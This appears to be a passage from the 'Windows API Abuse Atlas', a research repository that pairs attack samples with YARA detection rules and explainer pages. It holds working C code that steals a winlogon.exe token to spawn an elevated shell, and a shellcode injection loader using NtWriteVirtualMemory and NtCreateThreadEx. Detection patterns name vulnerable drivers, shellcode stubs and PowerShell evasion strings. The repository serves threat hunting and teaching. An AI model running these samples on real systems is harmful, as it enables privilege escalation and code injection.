TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY | TOKEN_QUERY, &hToken)) { 17 | *outToken = hToken; 18 | CloseHandle(hProcess); 19 | CloseHandle(hSnapshot); 20 | return TRUE; 21 | } 22 | CloseHandle(hProcess); 23 | } 24 | } 25 | } while (Process32NextW(hSnapshot, &pe)); 26 | 27 | CloseHandle(hSnapshot); 28 | return FALSE; 29 | } 30 | 31 | int wmain() { 32 | HANDLE stolenToken = NULL; 33 | 34 | // 🕵️ Target high-privilege process (must be running) 35 | if (!GetProcessTokenByName(L"winlogon.exe", &stolenToken)) { 36 | wprintf(L"[!] Failed to steal token\n"); 37 | return 1; 38 | } 39 | 40 | HANDLE dupToken = NULL; 41 | if (!DuplicateTokenEx( 42 | stolenToken, 43 | TOKEN_ALL_ACCESS, 44 | NULL, 45 | SecurityImpersonation, 46 | TokenPrimary, 47 | &dupToken)) { 48 | wprintf(L"[!] DuplicateTokenEx failed (%lu)\n", GetLastError()); 49 | CloseHandle(stolenToken); 50 | return 1; 51 | } 52 | 53 | // 🧨 Payload 54 | WCHAR cmd[] = L"C:\\Windows\\System32\\cmd.exe"; 55 | STARTUPINFOW si = { .cb = sizeof(si) }; 56 | PROCESS_INFORMATION pi; 57 | 58 | if (!CreateProcessWithTokenW( 59 | dupToken, 60 | LOGON_WITH_PROFILE, 61 | cmd, 62 | NULL, 63 | CREATE_NEW_CONSOLE, 64 | NULL, 65 | NULL, 66 | &si, 67 | &pi)) { 68 | wprintf(L"[!] CreateProcessWithTokenW failed (%lu)\n", GetLastError()); 69 | CloseHandle(dupToken); 70 | CloseHandle(stolenToken); 71 | return 1; 72 | } 73 | 74 | wprintf(L"[+] Spawned elevated cmd.exe!\n"); 75 | 76 | CloseHandle(pi.hProcess); 77 | CloseHandle(pi.hThread); 78 | CloseHandle(dupToken); 79 | CloseHandle(stolenToken); 80 | return 0; 81 | } 82 | -------------------------------------------------------------------------------- /NTDLL/NtLoadDriver/NtLoadDriver.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Windows_API_Abuse_Driver_Load_with_PrivEsc 6 | { 7 | meta: 8 | description = "Detects suspicious usage of NtMapViewOfSection API commonly abused in process injection" 9 | author = "WindowsAPIAbuseAtlas" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | strings: 12 | // Privilege escalation APIs often abused 13 | $adjust_token = "AdjustTokenPrivileges" ascii wide 14 | $impersonate_thread = "NtImpersonateThread" ascii wide 15 | $set_info_thread = "NtSetInformationThread" ascii wide 16 | $open_process_token = "OpenProcessToken" ascii wide 17 | $lookup_privilege_value = "LookupPrivilegeValue" ascii wide 18 | $open_thread_token = "OpenThreadToken" ascii wide 19 | 20 | // Driver loading APIs 21 | $ntload = "NtLoadDriver" ascii wide 22 | //$zwload = "ZwLoadDriver" ascii wide 23 | 24 | // Registry path often used to point to drivers 25 | $regpath = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\" ascii wide 26 | 27 | // Known vulnerable or commonly abused driver names (including cryptomining) 28 | $vuln_driver1 = "rwe.sys" ascii wide 29 | $vuln_driver2 = "cvss.sys" ascii wide 30 | $vuln_driver3 = "kbeu.sys" ascii wide 31 | $vuln_driver4 = "dbutil_2_3.sys" ascii wide 32 | $vuln_driver5 = "compbatt.sys" ascii wide 33 | $vuln_driver6 = "iqvw64e.sys" ascii wide 34 | $vuln_driver7 = "capcom.sys" ascii wide 35 | $vuln_driver8 = "tdx.sys" ascii wide 36 | $vuln_driver9 = "samsrv.sys" ascii wide 37 | $vuln_driver10 = "beep.sys" ascii wide 38 | $vuln_driver11 = "RTCore64.sys" ascii wide 39 | $vuln_driver12 = "nvlddmkm.sys" ascii wide 40 | $vuln_driver13 = "atikmdag.sys" ascii wide 41 | $vuln_driver14 = "procmon64.sys" ascii wide 42 | $vuln_driver15 = "amsint64.sys" ascii wide 43 | 44 | condition: 45 | // Require driver loading API + registry path + driver file extension + vulnerable driver 46 | // AND privilege escalation API somewhere in the file 47 | $ntload and 48 | $regpath and 49 | any of ($vuln_driver*) and 50 | any of ( 51 | $adjust_token, $impersonate_thread, $set_info_thread, $open_process_token, 52 | $lookup_privilege_value, $open_thread_token 53 | ) 54 | } -------------------------------------------------------------------------------- /KERNEL32/CreateToolhelp32Snapshot/sample.c: -------------------------------------------------------------------------------- 1 | #include // Required for Windows API functions 2 | #include // Required for Tool Help Library functions (CreateToolhelp32Snapshot, PROCESSENTRY32, etc.) 3 | #include // Required for standard input/output operations (printf) 4 | 5 | // Main function of the program 6 | int main() { 7 | // Declare a handle for the snapshot. 8 | // This handle will be used to refer to the captured system state. 9 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 10 | 11 | // Check if the snapshot was created successfully. 12 | // INVALID_HANDLE_VALUE indicates an error. 13 | if (hSnapshot == INVALID_HANDLE_VALUE) { 14 | printf("Error: Could not create process snapshot. Error Code: %lu\n", GetLastError()); 15 | return 1; // Return with an error code 16 | } 17 | 18 | // Declare a PROCESSENTRY32 structure. 19 | // This structure will hold information about each process. 20 | PROCESSENTRY32 pe32; 21 | 22 | // IMPORTANT: Before using PROCESSENTRY32, you must set its dwSize member 23 | // to the size of the structure. If you don't, Process32First/Next will fail. 24 | pe32.dwSize = sizeof(PROCESSENTRY32); 25 | 26 | // Retrieve information about the first process encountered in the snapshot. 27 | // If this fails, it means there are no processes or an error occurred. 28 | if (!Process32First(hSnapshot, &pe32)) { 29 | printf("Error: Could not retrieve information about the first process. Error Code: %lu\n", GetLastError()); 30 | CloseHandle(hSnapshot); // Always close the handle if an error occurs 31 | return 1; 32 | } 33 | 34 | // Print a header for the output 35 | printf("Process List:\n"); 36 | printf("-----------------------------------------------------------------\n"); 37 | printf("%-8s %-8s %s\n", "PID", "PPID", "Process Name"); 38 | printf("-----------------------------------------------------------------\n"); 39 | 40 | // Loop through all processes in the snapshot 41 | do { 42 | // Print the Process ID, Parent Process ID, and the executable file name. 43 | // The szExeFile member is a null-terminated string containing the executable name. 44 | printf("%-8lu %-8lu %s\n", pe32.th32ProcessID, pe32.th32ParentProcessID, pe32.szExeFile); 45 | } while (Process32Next(hSnapshot, &pe32)); // Continue as long as there are more processes 46 | 47 | // Close the snapshot handle. 48 | // It's crucial to close handles to release system resources. 49 | CloseHandle(hSnapshot); 50 | 51 | printf("-----------------------------------------------------------------\n"); 52 | printf("Process enumeration complete.\n"); 53 | 54 | return 0; // Return successfully 55 | } 56 | -------------------------------------------------------------------------------- /ADVAPI32/RegSetValueEx/RegSetValueEx.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_RegCreateKeyEx_Usage 6 | { 7 | meta: 8 | description = "Detects binaries that reference RegCreateKeyEx and other registry-manipulating APIs" 9 | reference = "Windows API Abuse Atlas" 10 | strings: 11 | $regCreateKeyEx = "RegCreateKeyEx" ascii 12 | $regSetValueEx = "RegSetValueEx" ascii 13 | $regDeleteValue = "RegDeleteValue" ascii 14 | $regQueryValueEx = "RegQueryValueEx" ascii 15 | condition: 16 | uint16(0) == 0x5A4D and // PE file 17 | filesize < 10MB and 18 | 2 of ($reg*) 19 | } 20 | 21 | rule detect_suspicious_regcreatekey_activity { 22 | meta: 23 | description = "Detects binaries that reference RegCreateKeyEx and other registry-manipulating APIs" 24 | reference = "Windows API Abuse Atlas" 25 | 26 | strings: 27 | // Core API call 28 | $reg_create_key = "RegCreateKey" ascii wide 29 | 30 | // Suspicious registry paths/names (case-insensitive) 31 | $run_key1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" nocase ascii wide 32 | $run_key2 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce" nocase ascii wide 33 | $service_key = "SYSTEM\\CurrentControlSet\\Services" nocase ascii wide 34 | $schtasks = "Task Scheduler" nocase ascii wide // Looking for strings related to scheduled tasks 35 | $cl_sid = "{????????-????-????-????-????????????" // Common Class ID structure, often used for COM hijacking 36 | 37 | // Suspicious data often written to registry (examples) 38 | $exe_ext = ".exe" ascii wide 39 | $dll_ext = ".dll" ascii wide 40 | $powershell_cmd = "powershell.exe -NoP -NonI -Exec Bypass" nocase ascii wide // Common PowerShell evasion 41 | $base64_encoded = "aHR0c" ascii // Common start of base64 encoded strings (e.g., for commands) 42 | 43 | condition: 44 | uint16(0) == 0x5A4D and // PE file 45 | filesize < 10MB and 46 | 47 | // The core API call must be present 48 | $reg_create_key and 49 | 50 | // At least one suspicious registry path/name 51 | ( 52 | $run_key1 or 53 | $run_key2 or 54 | $service_key or 55 | $schtasks or 56 | $cl_sid 57 | ) and 58 | 59 | // At least one suspicious data string or pattern 60 | ( 61 | $exe_ext or 62 | $dll_ext or 63 | $powershell_cmd or 64 | $base64_encoded 65 | ) 66 | } -------------------------------------------------------------------------------- /NTDLL/LdrGetProcedureAddress/LdrGetProcedureAddress.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_LdrGetProcedureAddress_Usage 6 | { 7 | meta: 8 | description = "Detects potential malicious use of LdrGetProcedureAddress" 9 | author = "Windows API Abuse Atlas" 10 | 11 | strings: 12 | // Direct string references 13 | $ldr_str1 = "LdrGetProcedureAddress" ascii wide 14 | 15 | // Common suspicious API calls often used with LdrGetProcedureAddress 16 | $api_ntdll = "ntdll.dll" ascii wide nocase 17 | $api_virtualalloc = "VirtualAlloc" ascii wide nocase 18 | $api_virtualprotect = "VirtualProtect" ascii wide nocase 19 | $api_createthread = "CreateThread" ascii wide nocase 20 | $api_writeprocessmemory = "WriteProcessMemory" ascii wide nocase 21 | $api_setthreadcontext = "SetThreadContext" ascii wide nocase 22 | 23 | 24 | condition: 25 | uint16(0) == 0x5A4D and // PE header "MZ" 26 | // Basic detection - any reference to the function 27 | $ldr_str1 and 28 | 29 | // Enhanced detection - LdrGetProcedureAddress + suspicious APIs 30 | (2 of ($api_*)) 31 | } 32 | 33 | rule Advanced_LdrGetProcedureAddress_Evasion 34 | { 35 | meta: 36 | description = "Detects advanced evasion techniques with LdrGetProcedureAddress" 37 | author = "Wineows API Abuse Atlas" 38 | 39 | strings: 40 | // Stack strings or split strings 41 | $split1 = "Ldr" ascii wide 42 | $split2 = "Get" ascii wide 43 | $split3 = "Procedure" ascii wide 44 | $split4 = "Address" ascii wide 45 | 46 | // Hash-based resolution indicators 47 | $hash_pattern1 = { 40 8A ?? 8A ?? 02 ?? 8B ?? C1 ?? ?? 03 ?? } // Common hash calculation 48 | $hash_pattern2 = { 33 ?? 8B ?? 8A ?? C1 ?? ?? 03 ?? } // Another hash variant 49 | 50 | // Dynamic resolution patterns 51 | $getprocaddr = "GetProcAddress" ascii wide nocase 52 | $loadlibrary = "LoadLibrary" ascii wide nocase 53 | 54 | condition: 55 | uint16(0) == 0x5A4D and // PE header "MZ" 56 | // Split string technique 57 | (all of ($split*) and #split1 < 5 and #split2 < 5 and #split3 < 5 and #split4 < 5) or 58 | 59 | // Hash-based resolution with library loading 60 | (any of ($hash_pattern*) and ($getprocaddr or $loadlibrary)) or 61 | 62 | // Multiple evasion indicators 63 | (2 of ($split*) and any of ($hash_pattern*)) 64 | } -------------------------------------------------------------------------------- /NTDLL/NtMapViewOfSection/NtMapViewOfSection.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Suspicious_NtMapViewOfSection_Usage 6 | { 7 | meta: 8 | description = "Detects suspicious usage of NtMapViewOfSection API commonly abused in process injection" 9 | author = "WindowsAPIAbuseAtlas" 10 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 11 | strings: 12 | $api_name = "NtMapViewOfSection" 13 | $related_api_1 = "NtCreateSection" 14 | $related_api_2 = "NtCreateThreadEx" 15 | $related_api_3 = "NtUnmapViewOfSection" 16 | $exec_perm = "PAGE_EXECUTE_READWRITE" 17 | 18 | condition: 19 | uint16(0) == 0x5A4D and 20 | filesize < 10MB and 21 | $api_name and ( 22 | ($related_api_1 and $related_api_3) or 23 | ($related_api_2 and $related_api_3) or 24 | $exec_perm 25 | ) 26 | } 27 | 28 | rule NtMapViewOfSection_SharedShellcode_GUIInjection 29 | { 30 | meta: 31 | description = "Detects memory-resident shellcode injected via shared sections and GUI function pointer abuse (SetWindowLong)" 32 | author = "WindowsAPIAbuseAtlas" 33 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 34 | strings: 35 | $api1 = "NtCreateSection" ascii 36 | $api2 = "NtMapViewOfSection" ascii 37 | $api3 = "SetWindowLong" ascii 38 | $api4 = "SendMessage" ascii 39 | $api5 = "Shell_TrayWnd" ascii 40 | $api6 = "GetWindowLong" ascii 41 | $api7 = "PAGE_EXECUTE_READWRITE" ascii wide 42 | //$gui1 = "WorkerW" ascii 43 | $shellcode_hint1 = { 60 E8 ?? ?? ?? ?? 5B 81 EB } 44 | // PUSHAD; CALL ; POP EBX; SUB EBX — classic shellcode setup 45 | 46 | $shellcode_hint2 = { FC E8 ?? ?? ?? ?? 60 89 E5 31 C0 } 47 | // Metasploit/Cobalt Strike decoder stub — CLD; CALL; PUSHAD; MOV EBP, ESP; XOR EAX, EAX 48 | 49 | $shellcode_hint3 = { 31 C0 50 68 2E 65 78 65 68 63 61 6C 63 8B C4 } 50 | // PUSH ".exe"; PUSH "calc"; typical string-building for loader shellcode 51 | 52 | $shellcode_hint4 = { 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD } 53 | // PEB/TEB walking — used to resolve kernel32 base address in shellcode 54 | 55 | $shellcode_hint5 = { 68 33 32 00 00 68 77 73 32 5F 54 68 4C 77 26 07 } 56 | // PUSH "32"; PUSH "ws2_"; PUSH DWORDs; often part of Win32 shellcode stagers 57 | 58 | //$sec_commit = "SEC_COMMIT" ascii wide 59 | condition: 60 | uint16(0) == 0x5A4D and 61 | filesize < 10MB and 62 | 3 of ($api*) and 1 of ($shellcode_hint*) 63 | } 64 | 65 | -------------------------------------------------------------------------------- /NTDLL/NtDeviceIoControlFile/NtDeviceIoControlFile.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | 6 | rule NtDeviceIoControlFile_Suspicious_Combo 7 | { 8 | meta: 9 | description = "Detects binaries using NtDeviceIoControlFile with other driver-related APIs" 10 | author = "WindowsAPIAbuseAtlas" 11 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 12 | strings: 13 | $ntdev = "NtDeviceIoControlFile" ascii wide 14 | $ntopen = "NtOpenFile" ascii wide 15 | $ntload = "NtLoadDriver" ascii wide 16 | $ntunload = "NtUnloadDriver" ascii wide 17 | condition: 18 | uint16(0) == 0x5A4D and 19 | $ntdev and (1 of ($ntopen, $ntload, $ntunload)) 20 | } 21 | 22 | rule NtDeviceIoControlFile_KnownBad_IOCTL 23 | { 24 | meta: 25 | description = "Detects use of NtDeviceIoControlFile with known suspicious IOCTL codes" 26 | author = "WindowsAPIAbuseAtlas" 27 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 28 | strings: 29 | $ntdev = "NtDeviceIoControlFile" ascii wide 30 | // RTCore64.sys 31 | $ioctl1 = { 0C 24 22 00 } 32 | $ioctl2 = { 08 24 22 00 } 33 | // GDRV.sys 34 | $ioctl3 = { 08 28 50 C3 } 35 | $ioctl4 = { 0C 28 50 C3 } 36 | // AsrDrv104.sys 37 | $ioctl5 = { 80 25 40 9C } 38 | $ioctl6 = { 84 25 40 9C } 39 | // KProcessHacker.sys 40 | $ioctl7 = { 0B 20 22 00 } 41 | $ioctl8 = { 0F 20 22 00 } 42 | condition: 43 | uint16(0) == 0x5A4D and 44 | $ntdev and any of ($ioctl*) 45 | } 46 | 47 | rule NtDeviceIoControlFile_SuspiciousStrings 48 | { 49 | meta: 50 | description = "Detects suspicious driver/device names with NtDeviceIoControlFile" 51 | author = "WindowsAPIAbuseAtlas" 52 | reference = "https://github.com/danafaye/WindowsAPIAbuseAtlas" 53 | strings: 54 | $ntdev = "NtDeviceIoControlFile" ascii wide 55 | $drv1 = "\\\\.\\PhysicalDrive" ascii wide 56 | $drv2 = "\\\\.\\EvilDrv" ascii wide 57 | $drv3 = "\\\\.\\KProcessHacker" ascii wide 58 | $drv4 = "\\\\.\\GLOBALROOT\\Device\\Harddisk" ascii wide 59 | $drv5 = "\\\\.\\AsrDrv104" ascii wide 60 | $drv6 = "\\\\.\\GIO" ascii wide 61 | $drv7 = "\\\\.\\RTCore64" ascii wide 62 | $drv8 = "\\\\.\\DBUtil_2_3" ascii wide 63 | $drv9 = "\\\\.\\Sys" ascii wide 64 | $drv10 = "\\\\.\\WinRing0_1_2_0" ascii wide 65 | $drv11 = "\\\\.\\NvFlash" ascii wide 66 | $drv12 = "\\\\.\\MsIo" ascii wide 67 | $drv13 = "\\\\.\\PROCEXP152" ascii wide 68 | $drv14 = "\\\\.\\TaskExplorer" ascii wide 69 | $drv15 = "\\\\.\\VBoxDrv" ascii wide 70 | $drv16 = "\\\\.\\HackSysExtremeVulnerableDriver" ascii wide 71 | $drv17 = "\\\\.\\afd" ascii wide 72 | $drv18 = "\\\\.\\pipe\\" ascii wide 73 | $drv19 = "\\\\.\\SbieDrv" ascii wide 74 | $drv20 = "\\\\.\\Global\\EPMMap" ascii wide 75 | condition: 76 | uint16(0) == 0x5A4D and 77 | $ntdev and any of ($drv*) 78 | } -------------------------------------------------------------------------------- /SHELL32/SHGetKnownFolderPath/README.md: -------------------------------------------------------------------------------- 1 | # 🛠️ SHGetKnownFolderPath: 2 | 3 | ## 🚀 Executive Summary 4 | `SHGetKnownFolderPath` is a Windows Shell API function that returns the full path of a known folder like the Desktop, Documents, AppData, or Startup directories. While legitimate software uses it to quickly locate standard OS folders, attackers abuse it to locate persistence friendly directories, hide malicious files in obscure locations, or target sensitive data stores. This API appears in commodity malware, advanced persistent threats (APTs), and red team tooling alike making it a useful hunting pivot when seen in combination with suspicious file or process creation. 5 | 6 | ## 🔍 What is SHGetKnownFolderPath? 7 | This Shell API (exported from shell32.dll) accepts a folder GUID and returns its corresponding file system path. For example, `FOLDERID_Startup` maps to the user’s Startup directory, while `FOLDERID_LocalAppData` points to %LOCALAPPDATA%. 8 | 9 | [Microsoft Documentation for Folder GUIDs](https://learn.microsoft.com/en-us/windows/win32/shell/knownfolderid) 10 | 11 | ## 🚩 Why It Matters 12 | By resolving paths dynamically, malware can adapt to any user profile or Windows version, making it more portable and stealthy. Targeted folders often contain startup scripts, cached credentials, or sensitive documents, making them ideal for persistence, staging, or theft. 13 | 14 | ## 🧬 How Attackers Abuse It 15 | Malware has used this API to find the Startup folder for auto run payloads, identify AppData for staging malicious files, and locate user specific data stores for exfiltration. This avoids brittle hardcoded paths and blends malicious behavior into normal system calls. 16 | 17 | ## 🛡️ Detection Opportunities 18 | Correlate `SHGetKnownFolderPath` calls with suspicious follow on actions like file creation in Startup, AppData, or Temp. Monitor for this API preceding script drops, executable writes, or process launches from those directories. 19 | 20 | Here are some sample YARA rules to detect suspicious use of `SHGetKnownFolderPath`: 21 | 22 | See [SHGetKnownFolderPath.yar](./SHGetKnownFolderPath.yar). 23 | 24 | > **Note:** Use these YARA rules at your own risk. They are loosely scoped and intended primarily for threat hunting and research purposes; **NOT** for deployment in detection systems that require a low false positive rate. Please review and test in your environment before use. 25 | 26 | ### 🐾 Behavioral Indicators 27 | - Startup folder resolved → new .vbs, .bat, .lnk, or executable file created. 28 | - LocalAppData resolved → file write followed by network activity. 29 | 30 | ## 🦠 Malware & Threat Actors Documented Abusing SHGetKnownFolderPath 31 | 32 | ### **Ransomware** 33 | - DarkHotel 34 | - SugarLocker 35 | 36 | ### **Commodity Loaders & RATs** 37 | - JellyDust 38 | - RoKRAT 39 | 40 | ### **APT & Threat Actor Toolkits** 41 | - APT37 42 | - APT41 43 | 44 | ### **Red Team & Open Source Tools** 45 | - Cobalt Strike 46 | - Empire 47 | - Power Sploit 48 | 49 | > **Note:** This list isn’t exhaustive. It is possible more modern malware families and offensive security tools use `SHGetKnownFolderPath`. 50 | 51 | ## 🧵 `SHGetKnownFolderPath` and Friends 52 | Related APIs include SHGetFolderPath (legacy), SHGetKnownFolderIDList (returns ITEMIDLIST), and ExpandEnvironmentStrings (environment variable–based path resolution). 53 | 54 | ## 📚 Resources 55 | [Microsoft Docs: SHGetKnownFolderPath](https://learn.microsoft.com/en-us/windows/win32/api/shlobj_core/nf-shlobj_core-shgetknownfolderpath) 56 | [Windows API Abuse Atlas](https://github.com/danafaye/WindowsAPIAbuseAtlas) 57 | 58 | > Open a PR or issue to help keep this list up to date! -------------------------------------------------------------------------------- /NETAPI32/NetLocalGroupGetMembers/README.md: -------------------------------------------------------------------------------- 1 | # NetLocalGroupGetMembers 2 | 3 | ## 🚀 Executive Summary 4 | **`NetLocalGroupGetMembers`** enumerates members of local groups on a remote machine over the network. Attackers use it during post-exploitation to identify privileged accounts, map lateral movement paths, and find misconfigured group memberships. By revealing who has local control on each system—even across domain boundaries when allowed; it provides critical visibility for privilege escalation and persistence. While legitimate admins rely on it for local access management, adversaries exploit it to understand and expand their foothold. 5 | 6 | ## 🚩 Why It Matters 7 | `NetLocalGroupGetMembers` reveals local group memberships, essential for managing permissions but also a favorite tool for attackers. By quietly enumerating group members, hackers identify high-value targets like admins and privileged users. This info helps them plan privilege escalation and lateral movement early in an attack. Understanding its abuse is key to spotting and stopping stealthy reconnaissance. 8 | 9 | ## 🧬 How Attackers Abuse It 10 | 11 | - **Privilege Discovery**: Attackers use this API to find admin group members and spot high-value accounts — the prime targets for takeover. 12 | 13 | - **Reconnaissance Operations**: It’s a favorite for quietly mapping out who’s who and figuring out paths for moving laterally across a network. 14 | 15 | - **Post-Exploitation Activities**: Once inside, hackers validate what a compromised account can do, hunt for more targets, and sniff out service accounts running security tools to stay under the radar. 16 | 17 | ## 🛡️ Detection Opportunities 18 | 19 | - **What to watch for**: Rapid-fire group queries targeting admin or multiple groups in quick succession, especially from unusual accounts or systems. Cross-domain group enumeration is a red flag, too. Keep in mind, attackers often use higher-level tools like PowerShell or PowerView that call `NetLocalGroupGetMembers` indirectly, so direct API calls might be rare or hidden. 20 | 21 | - **What to capture**: Record source accounts and systems, targeted groups, query frequency and volume, plus network context. Deep API or syscall monitoring can catch stealthier indirect usage, so combine these logs with telemetry from native tools and command-line activity for fuller visibility. 22 | 23 | 24 | ## 🦠 Malware & Threat Actors Documented Abusing NtMapViewOfSection 25 | 26 | **NetLocalGroupGetMembers** rarely appears explicitly in threat reports because attackers usually access it indirectly through PowerShell (`Get-LocalGroupMember`), built-in commands (`net localgroup`), or frameworks like PowerView. These tools call the API under the hood, hiding direct usage. Detecting `NetLocalGroupGetMembers` requires deep API or syscall monitoring beyond typical telemetry. 27 | 28 | ### Read Team & Open Source Tools 29 | - PowerView 30 | - SharpView 31 | - PowerSploit recon 32 | 33 | ### 🧵 NetLocalGroupGetMembers and Friends 34 | These Net* APIs are a goldmine for recon. `NetLocalGroupEnum` lets attackers list all the local groups on a system, while `NetUserEnum` spills the names of all user accounts. From there, `NetUserGetLocalGroups` maps users to their local group memberships, and `NetGroupGetUsers` does the same for domain groups. Used together, they give attackers a full picture of group structures and relationships — a perfect setup for privilege mapping, lateral movement, or just figuring out who’s worth targeting next. 35 | 36 | ## References 37 | - [Microsoft Documentation](https://learn.microsoft.com/en-us/windows/win32/api/lmaccess/nf-lmaccess-netlocalgroupgetmembers) 38 | - [Windows API Abuse Atlas](https://github.com/danafaye/WindowsAPIAbuseAtlas) -------------------------------------------------------------------------------- /NTDLL/NtWriteVirtualMemory/sample.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // Function prototypes for Native APIs 6 | typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)( 7 | HANDLE ProcessHandle, 8 | PVOID BaseAddress, 9 | PVOID Buffer, 10 | ULONG NumberOfBytesToWrite, 11 | PULONG NumberOfBytesWritten 12 | ); 13 | 14 | typedef NTSTATUS(NTAPI* pNtCreateThreadEx)( 15 | PHANDLE ThreadHandle, 16 | ACCESS_MASK DesiredAccess, 17 | PVOID ObjectAttributes, 18 | HANDLE ProcessHandle, 19 | PVOID StartRoutine, 20 | PVOID Argument, 21 | ULONG CreateFlags, 22 | SIZE_T ZeroBits, 23 | SIZE_T StackSize, 24 | SIZE_T MaximumStackSize, 25 | PVOID AttributeList 26 | ); 27 | 28 | int main(void) { 29 | unsigned char shellcode[] = { 30 | 0x48, 0x83, 0xEC, 0x28, 0x48, 0x83, 0xE4, 0xF0, 0x48, 0x8D, 0x15, 0x66, 31 | 0x00, 0x00, 0x00, 0x48, 0x8D, 0x0D, 0x52, 0x00, 0x00, 0x00, 0xE8, 0x00, 32 | 0x00, 0x00, 0x00, 0x58 33 | }; 34 | 35 | HMODULE hNtdll; 36 | HANDLE hProcess; 37 | HANDLE hThread; 38 | PVOID baseAddress; 39 | ULONG bytesWritten; 40 | NTSTATUS status; 41 | pNtWriteVirtualMemory NtWriteVirtualMemory; 42 | pNtCreateThreadEx NtCreateThreadEx; 43 | 44 | /* Get handle to ntdll.dll */ 45 | hNtdll = GetModuleHandleA("ntdll.dll"); 46 | if (hNtdll == NULL) { 47 | printf("Failed to get ntdll handle\n"); 48 | return 1; 49 | } 50 | 51 | /* Get function addresses */ 52 | NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory"); 53 | NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx"); 54 | 55 | if (!NtWriteVirtualMemory || !NtCreateThreadEx) { 56 | printf("Failed to get function addresses\n"); 57 | return 1; 58 | } 59 | 60 | /* Get process handle */ 61 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, GetCurrentProcessId()); 62 | if (hProcess == NULL) { 63 | printf("Failed to open process\n"); 64 | return 1; 65 | } 66 | 67 | /* Allocate memory with execute permissions */ 68 | baseAddress = VirtualAllocEx( 69 | hProcess, 70 | NULL, 71 | sizeof(shellcode), 72 | MEM_COMMIT | MEM_RESERVE, 73 | PAGE_EXECUTE_READWRITE 74 | ); 75 | 76 | if (baseAddress == NULL) { 77 | printf("Failed to allocate memory\n"); 78 | CloseHandle(hProcess); 79 | return 1; 80 | } 81 | 82 | /* Write shellcode using NtWriteVirtualMemory */ 83 | status = NtWriteVirtualMemory( 84 | hProcess, 85 | baseAddress, 86 | shellcode, 87 | sizeof(shellcode), 88 | &bytesWritten 89 | ); 90 | 91 | if (status != 0) { 92 | printf("Failed to write memory\n"); 93 | VirtualFreeEx(hProcess, baseAddress, 0, MEM_RELEASE); 94 | CloseHandle(hProcess); 95 | return 1; 96 | } 97 | 98 | /* Create thread to execute shellcode */ 99 | status = NtCreateThreadEx( 100 | &hThread, 101 | THREAD_ALL_ACCESS, 102 | NULL, 103 | hProcess, 104 | baseAddress, 105 | NULL, 106 | 0, 107 | 0, 108 | 0, 109 | 0, 110 | NULL 111 | ); 112 | 113 | if (status != 0) { 114 | printf("Failed to create thread\n"); 115 | VirtualFreeEx(hProcess, baseAddress, 0, MEM_RELEASE); 116 | CloseHandle(hProcess); 117 | return 1; 118 | } 119 | 120 | WaitForSingleObject(hThread, INFINITE); 121 | 122 | /* Cleanup */ 123 | CloseHandle(hThread); 124 | VirtualFreeEx(hProcess, baseAddress, 0, MEM_RELEASE); 125 | CloseHandle(hProcess); 126 | 127 | return 0; 128 | } -------------------------------------------------------------------------------- /PSAPI/EnumProcessModules/EnumProcessModules.yar: -------------------------------------------------------------------------------- 1 | // Note: Use these YARA rules at your own risk. They are loosely scoped and intended primarily 2 | // for threat hunting and research purposes — not for deployment in detection systems that 3 | // require a low false positive rate. Please review and test in your environment before use. 4 | 5 | rule Possible_EnumProcessModules_API_Usage 6 | { 7 | meta: 8 | description = "Detects binaries importing or referencing EnumProcessModules" 9 | reference = "Windows API Abuse Atlas - EnumProcessModules" 10 | 11 | strings: 12 | $import1 = "EnumProcessModules" ascii 13 | $import2 = "EnumProcessModulesEx" ascii 14 | $dll = "psapi.dll" ascii 15 | 16 | condition: 17 | uint16(0) == 0x5A4D and // PE file 18 | filesize < 10MB and 19 | any of ($import*) and $dll 20 | } 21 | 22 | rule EnumProcessModules_Followed_By_Injection_APIs 23 | { 24 | meta: 25 | description = "Detects binaries referencing EnumProcessModules along with common injection APIs" 26 | reference = "Windows API Abuse Atlas - EnumProcessModules" 27 | 28 | strings: 29 | $enum = "EnumProcessModules" ascii 30 | $inj1 = "WriteProcessMemory" ascii 31 | $inj2 = "CreateRemoteThread" ascii 32 | $inj3 = "VirtualProtectEx" ascii 33 | $inj4 = "VirtualAllocEx" ascii 34 | 35 | condition: 36 | uint16(0) == 0x5A4D and // PE file 37 | filesize < 10MB and 38 | $enum and (1 of ($inj*)) 39 | } 40 | 41 | rule EnumProcessModules_AntiAnalysis_Check 42 | { 43 | meta: 44 | description = "Detects use of EnumProcessModules to look for analysis or security tools" 45 | reference = "Windows API Abuse 